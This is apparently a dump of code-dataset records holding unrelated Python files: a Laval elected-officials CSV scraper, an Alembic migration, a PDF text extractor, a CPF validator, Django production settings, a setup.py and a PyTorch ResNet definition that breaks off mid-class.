'Concorde - Bois-de-Boulogne': 'Concorde-Bois-de-Boulogne',
"L'Abord-a-Plouffe": 'Abord-à-Plouffe',
"L'Oree-des-bois": "L'Orée-des-Bois",
'Laval-les-Iles': 'Laval-les-Îles',
'Marc-Aurele-Fortin': 'Marc-Aurèle-Fortin',
'Saint-Francois': 'Saint-François',
'Sainte-Dorothee': 'Sainte-Dorothée',
},
}
# Absurdly, Laval has decided "les en-têtes ne comportent pas de
# caractères accentués ou d'espaces" and includes a byte order mark.
def header_converter(self, s):
s = super(LavalPersonScraper, self).header_converter(s.replace('-', ' '))
return {
'role': 'primary role',
'prenom': 'first name',
'localite': 'locality',
'telephone': 'phone',
'telecopieur': 'fax',
'url photo': 'photo url',
}.get(s, s)
| 41.657143 | 245 | 0.620027 | from utils import CSVScraper
class LavalPersonScraper(CSVScraper):
csv_url = 'https://www.donneesquebec.ca/recherche/dataset/8fe69713-fade-4751-a0b4-7e57a81886b1/resource/bb38e19e-26ab-495c-a0f7-ed6b3268b6e6/download/cusersapp.netappdatalocaltemp288c1490-df30-472a-8170-dd06728f449alistedeselus2013-2017.csv'
encoding = 'utf-8-sig'
locale = 'fr'
corrections = {
'district name': {
'Concorde - Bois-de-Boulogne': 'Concorde-Bois-de-Boulogne',
"L'Abord-a-Plouffe": 'Abord-à-Plouffe',
"L'Oree-des-bois": "L'Orée-des-Bois",
'Laval-les-Iles': 'Laval-les-Îles',
'Marc-Aurele-Fortin': 'Marc-Aurèle-Fortin',
'Saint-Francois': 'Saint-François',
'Sainte-Dorothee': 'Sainte-Dorothée',
},
}
# Absurdly, Laval has decided "les en-têtes ne comportent pas de
# caractères accentués ou d'espaces" and includes a byte order mark.
def header_converter(self, s):
s = super(LavalPersonScraper, self).header_converter(s.replace('-', ' '))
return {
'role': 'primary role',
'prenom': 'first name',
'localite': 'locality',
'telephone': 'phone',
'telecopieur': 'fax',
'url photo': 'photo url',
}.get(s, s)
| true | true |
1c4a970d54f96d0345653b8eb6c51e13009e1d1c | 414 | py | Python | migrations/versions/384da3b88896_new_contact_email.py | clld/waab | 9693da8887cf8498a47bc41250a2a048595f89f3 | [
"Apache-2.0"
] | 2 | 2015-05-11T13:29:04.000Z | 2017-12-23T04:15:02.000Z | migrations/versions/384da3b88896_new_contact_email.py | clld/waab | 9693da8887cf8498a47bc41250a2a048595f89f3 | [
"Apache-2.0"
] | null | null | null | migrations/versions/384da3b88896_new_contact_email.py | clld/waab | 9693da8887cf8498a47bc41250a2a048595f89f3 | [
"Apache-2.0"
] | 1 | 2015-12-06T22:03:18.000Z | 2015-12-06T22:03:18.000Z | """new contact email
Revision ID: 384da3b88896
Revises: 55912b4a9d56
Create Date: 2015-12-09 11:35:03.872107
"""
# revision identifiers, used by Alembic.
revision = '384da3b88896'
down_revision = '55912b4a9d56'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("update dataset set contact = '[email protected]'")
def downgrade():
pass
| 16.56 | 67 | 0.736715 |
revision = '384da3b88896'
down_revision = '55912b4a9d56'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("update dataset set contact = '[email protected]'")
def downgrade():
pass
| true | true |
1c4a978548c2fd3c6dc15d9d6849941890ca2470 | 1,984 | py | Python | COS498_FinalPrj/extr_pdf.py | melkimble/COS498 | c09ab1ee61f46ebd7b8b9a645787e474df62c3e2 | [
"MIT"
] | null | null | null | COS498_FinalPrj/extr_pdf.py | melkimble/COS498 | c09ab1ee61f46ebd7b8b9a645787e474df62c3e2 | [
"MIT"
] | null | null | null | COS498_FinalPrj/extr_pdf.py | melkimble/COS498 | c09ab1ee61f46ebd7b8b9a645787e474df62c3e2 | [
"MIT"
] | null | null | null | '''
https://stackoverflow.com/questions/26494211/extracting-text-from-a-pdf-file-using-pdfminer-in-python
https://github.com/pdfminer/pdfminer.six
'''
import io
import os
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
def convert_pdf_to_txt(path):
rsrcmgr = PDFResourceManager()
retstr = io.StringIO()
codec = 'utf-8'
laparams = LAParams()
device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)
fp = open(path, 'rb')
interpreter = PDFPageInterpreter(rsrcmgr, device)
password = ""
maxpages = 0
caching = True
pagenos = set()
for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages,
password=password,
caching=caching,
check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue()
fp.close()
device.close()
retstr.close()
return text
def pdfs2Array(testDataFolder):
# empty array that will contain all parsed pdf files for testing.
parsed_pdfs = []
fname=[]
for pdf in os.listdir(testDataFolder):
if pdf.endswith(".pdf"):
try:
ThePDFFile = (os.path.join(testDataFolder, pdf))
# pdf file converted to text
test = convert_pdf_to_txt(ThePDFFile)
# list of parsed pdf files
parsed_pdfs.append(test)
# list of pdf filenames
fname.append(ThePDFFile)
except Exception:
# if pdf cannot be read, continue to the next pdf
continue
return(parsed_pdfs,fname)
'''
text = convert_pdf_to_txt("D:/Dropbox/01_School/18SP/COS498/FinalProject/TestingData/Adam and Michelle Campbell, Pulpit Harbor Salt Pond, N. Haven.pdf")
#print(text)
''' | 32 | 152 | 0.634073 |
import io
import os
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
def convert_pdf_to_txt(path):
rsrcmgr = PDFResourceManager()
retstr = io.StringIO()
codec = 'utf-8'
laparams = LAParams()
device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)
fp = open(path, 'rb')
interpreter = PDFPageInterpreter(rsrcmgr, device)
password = ""
maxpages = 0
caching = True
pagenos = set()
for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages,
password=password,
caching=caching,
check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue()
fp.close()
device.close()
retstr.close()
return text
def pdfs2Array(testDataFolder):
parsed_pdfs = []
fname=[]
for pdf in os.listdir(testDataFolder):
if pdf.endswith(".pdf"):
try:
ThePDFFile = (os.path.join(testDataFolder, pdf))
test = convert_pdf_to_txt(ThePDFFile)
parsed_pdfs.append(test)
fname.append(ThePDFFile)
except Exception:
continue
return(parsed_pdfs,fname)
| true | true |
1c4a97869018cd998d4a5dc0c14d4c8520f52232 | 851 | py | Python | my_boilerplate_django_admin/core/helpers/string.py | diegoMasin/my-boilerplate-djangoadmin | ef84516957b4742a8459519ace15e37107691456 | [
"MIT"
] | null | null | null | my_boilerplate_django_admin/core/helpers/string.py | diegoMasin/my-boilerplate-djangoadmin | ef84516957b4742a8459519ace15e37107691456 | [
"MIT"
] | null | null | null | my_boilerplate_django_admin/core/helpers/string.py | diegoMasin/my-boilerplate-djangoadmin | ef84516957b4742a8459519ace15e37107691456 | [
"MIT"
] | null | null | null | def is_cpf(cpf):
# Obtém apenas os números do CPF, ignorando pontuações
numbers = [int(digit) for digit in cpf if digit.isdigit()]
# Verifica se o CPF possui 11 números:
if len(numbers) != 11:
return False
# Verifica se todos os números são repetidos
if len(list(dict.fromkeys(numbers))) == 1:
return False
# Validação do primeiro dígito verificador:
sum_of_products = sum(a * b for a, b in zip(numbers[0:9], range(10, 1, -1)))
expected_digit = (sum_of_products * 10 % 11) % 10
if numbers[9] != expected_digit:
return False
# Validação do segundo dígito verificador:
sum_of_products = sum(a * b for a, b in zip(numbers[0:10], range(11, 1, -1)))
expected_digit = (sum_of_products * 10 % 11) % 10
if numbers[10] != expected_digit:
return False
return True
| 32.730769 | 81 | 0.642773 | def is_cpf(cpf):
numbers = [int(digit) for digit in cpf if digit.isdigit()]
if len(numbers) != 11:
return False
if len(list(dict.fromkeys(numbers))) == 1:
return False
sum_of_products = sum(a * b for a, b in zip(numbers[0:9], range(10, 1, -1)))
expected_digit = (sum_of_products * 10 % 11) % 10
if numbers[9] != expected_digit:
return False
sum_of_products = sum(a * b for a, b in zip(numbers[0:10], range(11, 1, -1)))
expected_digit = (sum_of_products * 10 % 11) % 10
if numbers[10] != expected_digit:
return False
return True
| true | true |
1c4a980951b00ae54b20a33ead879e7bc50123b1 | 1,172 | py | Python | opentech/settings/production.py | JakabGy/hypha | 32634080ba1cb369f07f27f6616041e4eca8dbf2 | [
"BSD-3-Clause"
] | null | null | null | opentech/settings/production.py | JakabGy/hypha | 32634080ba1cb369f07f27f6616041e4eca8dbf2 | [
"BSD-3-Clause"
] | null | null | null | opentech/settings/production.py | JakabGy/hypha | 32634080ba1cb369f07f27f6616041e4eca8dbf2 | [
"BSD-3-Clause"
] | null | null | null | import os
from .base import * # noqa
# Disable debug mode
DEBUG = False
# Configuration from environment variables
env = os.environ.copy()
# Alternatively, you can set these in a local.py file on the server
try:
from .local import * # noqa
except ImportError:
pass
# Mailgun configuration.
if 'MAILGUN_API_KEY' in env:
EMAIL_BACKEND = 'anymail.backends.mailgun.EmailBackend'
ANYMAIL = {
"MAILGUN_API_KEY": env['MAILGUN_API_KEY'],
"MAILGUN_SENDER_DOMAIN": env.get('EMAIL_HOST', None),
"WEBHOOK_SECRET": env.get('ANYMAIL_WEBHOOK_SECRET', None)
}
# Sentry configuration.
if 'SENTRY_DSN' in env:
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.celery import CeleryIntegration
sentry_sdk.init(
dsn=env['SENTRY_DSN'],
environment=env.get('SENTRY_ENVIRONMENT', None),
integrations=[DjangoIntegration(), CeleryIntegration()]
)
# Heroku configuration.
# Set ON_HEROKU to true in Config Vars or via cli "heroku config:set ON_HEROKU=true".
if 'ON_HEROKU' in env:
import django_heroku
django_heroku.settings(locals())
| 27.904762 | 85 | 0.716724 | import os
from .base import *
DEBUG = False
env = os.environ.copy()
try:
from .local import * except ImportError:
pass
if 'MAILGUN_API_KEY' in env:
EMAIL_BACKEND = 'anymail.backends.mailgun.EmailBackend'
ANYMAIL = {
"MAILGUN_API_KEY": env['MAILGUN_API_KEY'],
"MAILGUN_SENDER_DOMAIN": env.get('EMAIL_HOST', None),
"WEBHOOK_SECRET": env.get('ANYMAIL_WEBHOOK_SECRET', None)
}
if 'SENTRY_DSN' in env:
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.celery import CeleryIntegration
sentry_sdk.init(
dsn=env['SENTRY_DSN'],
environment=env.get('SENTRY_ENVIRONMENT', None),
integrations=[DjangoIntegration(), CeleryIntegration()]
)
if 'ON_HEROKU' in env:
import django_heroku
django_heroku.settings(locals())
| true | true |
1c4a9a3776b6c9427c9e3dbf1a0cdddedadfcf4c | 1,811 | py | Python | setup.py | mcanu/django-jstemplate | 9af1e22681a318d077f4908b5c92d901e163772f | [
"BSD-3-Clause"
] | 11 | 2015-04-02T00:24:05.000Z | 2020-08-13T01:57:57.000Z | setup.py | mcanu/django-jstemplate | 9af1e22681a318d077f4908b5c92d901e163772f | [
"BSD-3-Clause"
] | 7 | 2015-03-03T09:54:34.000Z | 2021-04-04T14:35:03.000Z | setup.py | mcanu/django-jstemplate | 9af1e22681a318d077f4908b5c92d901e163772f | [
"BSD-3-Clause"
] | 8 | 2015-01-01T18:56:32.000Z | 2019-05-07T18:23:04.000Z | from os.path import join, dirname, abspath
from setuptools import setup, find_packages
here = dirname(abspath(__file__))
long_description = (open(join(here, "README.rst")).read() + "\n\n" +
open(join(here, "CHANGES.rst")).read() + "\n\n" +
open(join(here, "TODO.rst")).read())
def get_version():
fh = open(join(here, "jstemplate", "__init__.py"))
try:
for line in fh.readlines():
if line.startswith("__version__ ="):
return line.split("=")[1].strip().strip('"')
finally:
fh.close()
setup(
name="django-jstemplate",
version=get_version(),
description="A Django template tag for embedding Mustache.js templates -- or other JavaScript templates -- safely.",
long_description=long_description,
author="Mjumbe Wawatu Ukweli",
author_email="[email protected]",
url="https://github.com/mjumbewu/django-jstemplate/",
packages=find_packages(),
package_data={'jstemplate': ['static/libs/*.js']},
install_requires=[
'Django >= 1.3',
'six'
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Framework :: Django",
],
zip_safe=False,
tests_require=["Django>=1.3", "mock", "six"],
test_suite="runtests.runtests"
)
| 34.169811 | 120 | 0.595803 | from os.path import join, dirname, abspath
from setuptools import setup, find_packages
here = dirname(abspath(__file__))
long_description = (open(join(here, "README.rst")).read() + "\n\n" +
open(join(here, "CHANGES.rst")).read() + "\n\n" +
open(join(here, "TODO.rst")).read())
def get_version():
fh = open(join(here, "jstemplate", "__init__.py"))
try:
for line in fh.readlines():
if line.startswith("__version__ ="):
return line.split("=")[1].strip().strip('"')
finally:
fh.close()
setup(
name="django-jstemplate",
version=get_version(),
description="A Django template tag for embedding Mustache.js templates -- or other JavaScript templates -- safely.",
long_description=long_description,
author="Mjumbe Wawatu Ukweli",
author_email="[email protected]",
url="https://github.com/mjumbewu/django-jstemplate/",
packages=find_packages(),
package_data={'jstemplate': ['static/libs/*.js']},
install_requires=[
'Django >= 1.3',
'six'
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Framework :: Django",
],
zip_safe=False,
tests_require=["Django>=1.3", "mock", "six"],
test_suite="runtests.runtests"
)
| true | true |
1c4a9b7da7a8569e9efe0ece18d83db13ce8a2ef | 16,231 | py | Python | models/resnet.py | zyyhhxx/convNet.pytorch | 85f65f80b6d75810077c54bd3a8c9094cc2a26f9 | [
"MIT"
] | 2 | 2020-07-02T14:21:01.000Z | 2021-01-04T01:52:09.000Z | models/resnet.py | zyyhhxx/convNet.pytorch | 85f65f80b6d75810077c54bd3a8c9094cc2a26f9 | [
"MIT"
] | null | null | null | models/resnet.py | zyyhhxx/convNet.pytorch | 85f65f80b6d75810077c54bd3a8c9094cc2a26f9 | [
"MIT"
] | 1 | 2019-10-02T07:19:26.000Z | 2019-10-02T07:19:26.000Z | import torch
import torch.nn as nn
import torchvision.transforms as transforms
import math
from .modules.se import SEBlock
from .modules.checkpoint import CheckpointModule
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from utils.mixup import MixUp
__all__ = ['resnet', 'resnet_se']
def init_model(model):
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
for m in model.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
model.fc.weight.data.normal_(0, 0.01)
model.fc.bias.data.zero_()
def weight_decay_config(value=1e-4, log=False):
return {'name': 'WeightDecay',
'value': value,
'log': log,
'filter': {'parameter_name': lambda n: not n.endswith('bias'),
'module': lambda m: not isinstance(m, nn.BatchNorm2d)}
}
def mixsize_config(sz, base_size, base_batch, base_duplicates, adapt_batch, adapt_duplicates):
assert adapt_batch or adapt_duplicates or sz == base_size
batch_size = base_batch
duplicates = base_duplicates
if adapt_batch and adapt_duplicates:
scale = base_size/sz
else:
scale = (base_size/sz)**2
if scale * duplicates < 0.5:
adapt_duplicates = False
adapt_batch = True
if adapt_batch:
batch_size = int(round(scale * base_batch))
if adapt_duplicates:
duplicates = int(round(scale * duplicates))
duplicates = max(1, duplicates)
return {
'input_size': sz,
'batch_size': batch_size,
'duplicates': duplicates
}
def ramp_up_fn(lr0, lrT, T):
rate = (lrT - lr0) / T
return "lambda t: {'lr': %s + t * %s}" % (lr0, rate)
def conv3x3(in_planes, out_planes, stride=1, groups=1, bias=False):
"3x3 convolution with padding"
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, groups=groups, bias=bias)
class BasicBlock(nn.Module):
def __init__(self, inplanes, planes, stride=1, expansion=1,
downsample=None, groups=1, residual_block=None, dropout=0.):
super(BasicBlock, self).__init__()
dropout = 0 if dropout is None else dropout
self.conv1 = conv3x3(inplanes, planes, stride, groups=groups)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, expansion * planes, groups=groups)
self.bn2 = nn.BatchNorm2d(expansion * planes)
self.downsample = downsample
self.residual_block = residual_block
self.stride = stride
self.expansion = expansion
self.dropout = nn.Dropout(dropout)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(residual)
if self.residual_block is not None:
residual = self.residual_block(residual)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
def __init__(self, inplanes, planes, stride=1, expansion=4, downsample=None, groups=1, residual_block=None, dropout=0.):
super(Bottleneck, self).__init__()
dropout = 0 if dropout is None else dropout
self.conv1 = nn.Conv2d(
inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride=stride, groups=groups)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(
planes, planes * expansion, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * expansion)
self.relu = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(dropout)
self.downsample = downsample
self.residual_block = residual_block
self.stride = stride
self.expansion = expansion
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(residual)
if self.residual_block is not None:
residual = self.residual_block(residual)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self):
super(ResNet, self).__init__()
def _make_layer(self, block, planes, blocks, expansion=1, stride=1, groups=1, residual_block=None, dropout=None, mixup=False):
downsample = None
out_planes = planes * expansion
if stride != 1 or self.inplanes != out_planes:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, out_planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * expansion),
)
if residual_block is not None:
residual_block = residual_block(out_planes)
layers = []
layers.append(block(self.inplanes, planes, stride, expansion=expansion,
downsample=downsample, groups=groups, residual_block=residual_block, dropout=dropout))
self.inplanes = planes * expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, expansion=expansion, groups=groups,
residual_block=residual_block, dropout=dropout))
if mixup:
layers.append(MixUp())
return nn.Sequential(*layers)
def features(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
return x.view(x.size(0), -1)
def forward(self, x):
x = self.features(x)
x = self.fc(x)
return x
class ResNet_imagenet(ResNet):
num_train_images = 1281167
def __init__(self, num_classes=1000, inplanes=64,
block=Bottleneck, residual_block=None, layers=[3, 4, 23, 3],
width=[64, 128, 256, 512], expansion=4, groups=[1, 1, 1, 1],
regime='normal', scale_lr=1, ramp_up_lr=True, checkpoint_segments=0, mixup=False,
base_devices=4, base_device_batch=64, base_duplicates=1, base_image_size=224, mix_size_regime='D+'):
super(ResNet_imagenet, self).__init__()
self.inplanes = inplanes
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
for i in range(len(layers)):
layer = self._make_layer(block=block, planes=width[i], blocks=layers[i], expansion=expansion,
stride=1 if i == 0 else 2, residual_block=residual_block, groups=groups[i],
mixup=mixup)
if checkpoint_segments > 0:
layer_checkpoint_segments = min(checkpoint_segments, layers[i])
layer = CheckpointModule(layer, layer_checkpoint_segments)
setattr(self, 'layer%s' % str(i + 1), layer)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(width[-1] * expansion, num_classes)
init_model(self)
batch_size = base_devices * base_device_batch
num_steps_epoch = math.floor(self.num_train_images / batch_size)
# base regime
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': scale_lr * 1e-1,
'momentum': 0.9, 'regularizer': weight_decay_config(1e-4)},
{'epoch': 30, 'lr': scale_lr * 1e-2},
{'epoch': 60, 'lr': scale_lr * 1e-3},
{'epoch': 80, 'lr': scale_lr * 1e-4}
]
if 'cutmix' in regime:
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': scale_lr * 1e-1,
'momentum': 0.9, 'regularizer': weight_decay_config(1e-4)},
{'epoch': 75, 'lr': scale_lr * 1e-2},
{'epoch': 150, 'lr': scale_lr * 1e-3},
{'epoch': 225, 'lr': scale_lr * 1e-4}
]
# Sampled regimes from "Mix & Match: training convnets with mixed image sizes for improved accuracy, speed and scale resiliency"
if 'sampled' in regime:
# add gradient smoothing
self.regime[0]['regularizer'] = [{'name': 'GradSmooth', 'momentum': 0.9, 'log': False},
weight_decay_config(1e-4)]
ramp_up_lr = False
self.data_regime = None
def size_config(size): return mixsize_config(size, base_size=base_image_size, base_batch=base_device_batch, base_duplicates=base_duplicates,
adapt_batch=mix_size_regime == 'B+', adapt_duplicates=mix_size_regime == 'D+')
increment = int(base_image_size / 7)
if '144' in regime:
self.sampled_data_regime = [
(0.1, size_config(base_image_size+increment)),
(0.1, size_config(base_image_size)),
(0.6, size_config(base_image_size - 3*increment)),
(0.2, size_config(base_image_size - 4*increment)),
]
else: # sampled-224
self.sampled_data_regime = [
(0.8/6, size_config(base_image_size - 3*increment)),
(0.8/6, size_config(base_image_size - 2*increment)),
(0.8/6, size_config(base_image_size - increment)),
(0.2, size_config(base_image_size)),
(0.8/6, size_config(base_image_size + increment)),
(0.8/6, size_config(base_image_size + 2*increment)),
(0.8/6, size_config(base_image_size + 3*increment)),
]
self.data_eval_regime = [
{'epoch': 0, 'input_size': base_image_size}
]
if ramp_up_lr and scale_lr > 1: # add learning rate ramp-up
self.regime[0]['step_lambda'] = ramp_up_fn(0.1, 0.1 * scale_lr,
num_steps_epoch * 5)
self.regime.insert(1, {'epoch': 5, 'lr': scale_lr * 1e-1})
class ResNet_cifar(ResNet):
def __init__(self, num_classes=10, inplanes=16,
block=BasicBlock, depth=18, width=[16, 32, 64],
groups=[1, 1, 1], residual_block=None, regime='normal', dropout=None, mixup=False):
super(ResNet_cifar, self).__init__()
self.inplanes = inplanes
n = int((depth - 2) / 6)
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = lambda x: x
self.layer1 = self._make_layer(block, width[0], n, groups=groups[0],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer2 = self._make_layer(block, width[1], n, stride=2, groups=groups[1],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer3 = self._make_layer(block, width[2], n, stride=2, groups=groups[2],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer4 = lambda x: x
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(width[-1], num_classes)
init_model(self)
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': 1e-1, 'momentum': 0.9,
'regularizer': weight_decay_config(1e-4)},
{'epoch': 81, 'lr': 1e-2},
{'epoch': 122, 'lr': 1e-3},
{'epoch': 164, 'lr': 1e-4}
]
if 'wide-resnet' in regime:
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': 1e-1, 'momentum': 0.9,
'regularizer': weight_decay_config(5e-4)},
{'epoch': 60, 'lr': 2e-2},
{'epoch': 120, 'lr': 4e-3},
{'epoch': 160, 'lr': 8e-4}
]
# Sampled regimes from "Mix & Match: training convnets with mixed image sizes for improved accuracy, speed and scale resiliency"
if 'sampled' in regime:
adapt_batch = True if 'B+' in regime else False
adapt_duplicates = True if ('D+' in regime or not adapt_batch) \
else False
def size_config(size): return mixsize_config(size, base_size=32, base_batch=64, base_duplicates=1,
adapt_batch=adapt_batch, adapt_duplicates=adapt_duplicates)
# add gradient smoothing
self.regime[0]['regularizer'] = [{'name': 'GradSmooth', 'momentum': 0.9, 'log': False},
weight_decay_config(1e-4)]
self.data_regime = None
self.sampled_data_regime = [
(0.3, size_config(32)),
(0.2, size_config(48)),
(0.3, size_config(24)),
(0.2, size_config(16)),
]
self.data_eval_regime = [
{'epoch': 0, 'input_size': 32, 'scale_size': 32}
]
def resnet(**config):
dataset = config.pop('dataset', 'imagenet')
if config.pop('quantize', False):
from .modules.quantize import QConv2d, QLinear, RangeBN
torch.nn.Linear = QLinear
torch.nn.Conv2d = QConv2d
torch.nn.BatchNorm2d = RangeBN
bn_norm = config.pop('bn_norm', None)
if bn_norm is not None:
from .modules.lp_norm import L1BatchNorm2d, TopkBatchNorm2d
if bn_norm == 'L1':
torch.nn.BatchNorm2d = L1BatchNorm2d
if bn_norm == 'TopK':
torch.nn.BatchNorm2d = TopkBatchNorm2d
if 'imagenet' in dataset:
config.setdefault('num_classes', 1000)
depth = config.pop('depth', 50)
if depth == 18:
config.update(dict(block=BasicBlock,
layers=[2, 2, 2, 2],
expansion=1))
if depth == 34:
config.update(dict(block=BasicBlock,
layers=[3, 4, 6, 3],
expansion=1))
if depth == 50:
config.update(dict(block=Bottleneck, layers=[3, 4, 6, 3]))
if depth == 101:
config.update(dict(block=Bottleneck, layers=[3, 4, 23, 3]))
if depth == 152:
config.update(dict(block=Bottleneck, layers=[3, 8, 36, 3]))
if depth == 200:
config.update(dict(block=Bottleneck, layers=[3, 24, 36, 3]))
return ResNet_imagenet(**config)
elif dataset == 'cifar10':
config.setdefault('num_classes', 10)
config.setdefault('depth', 44)
return ResNet_cifar(block=BasicBlock, **config)
elif dataset == 'cifar100':
config.setdefault('num_classes', 100)
config.setdefault('depth', 44)
return ResNet_cifar(block=BasicBlock, **config)
def resnet_se(**config):
config['residual_block'] = SEBlock
return resnet(**config)
| 38.462085 | 152 | 0.566385 | import torch
import torch.nn as nn
import torchvision.transforms as transforms
import math
from .modules.se import SEBlock
from .modules.checkpoint import CheckpointModule
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from utils.mixup import MixUp
__all__ = ['resnet', 'resnet_se']
def init_model(model):
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
for m in model.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
model.fc.weight.data.normal_(0, 0.01)
model.fc.bias.data.zero_()
def weight_decay_config(value=1e-4, log=False):
return {'name': 'WeightDecay',
'value': value,
'log': log,
'filter': {'parameter_name': lambda n: not n.endswith('bias'),
'module': lambda m: not isinstance(m, nn.BatchNorm2d)}
}
def mixsize_config(sz, base_size, base_batch, base_duplicates, adapt_batch, adapt_duplicates):
assert adapt_batch or adapt_duplicates or sz == base_size
batch_size = base_batch
duplicates = base_duplicates
if adapt_batch and adapt_duplicates:
scale = base_size/sz
else:
scale = (base_size/sz)**2
if scale * duplicates < 0.5:
adapt_duplicates = False
adapt_batch = True
if adapt_batch:
batch_size = int(round(scale * base_batch))
if adapt_duplicates:
duplicates = int(round(scale * duplicates))
duplicates = max(1, duplicates)
return {
'input_size': sz,
'batch_size': batch_size,
'duplicates': duplicates
}
def ramp_up_fn(lr0, lrT, T):
rate = (lrT - lr0) / T
return "lambda t: {'lr': %s + t * %s}" % (lr0, rate)
def conv3x3(in_planes, out_planes, stride=1, groups=1, bias=False):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, groups=groups, bias=bias)
class BasicBlock(nn.Module):
def __init__(self, inplanes, planes, stride=1, expansion=1,
downsample=None, groups=1, residual_block=None, dropout=0.):
super(BasicBlock, self).__init__()
dropout = 0 if dropout is None else dropout
self.conv1 = conv3x3(inplanes, planes, stride, groups=groups)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, expansion * planes, groups=groups)
self.bn2 = nn.BatchNorm2d(expansion * planes)
self.downsample = downsample
self.residual_block = residual_block
self.stride = stride
self.expansion = expansion
self.dropout = nn.Dropout(dropout)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(residual)
if self.residual_block is not None:
residual = self.residual_block(residual)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
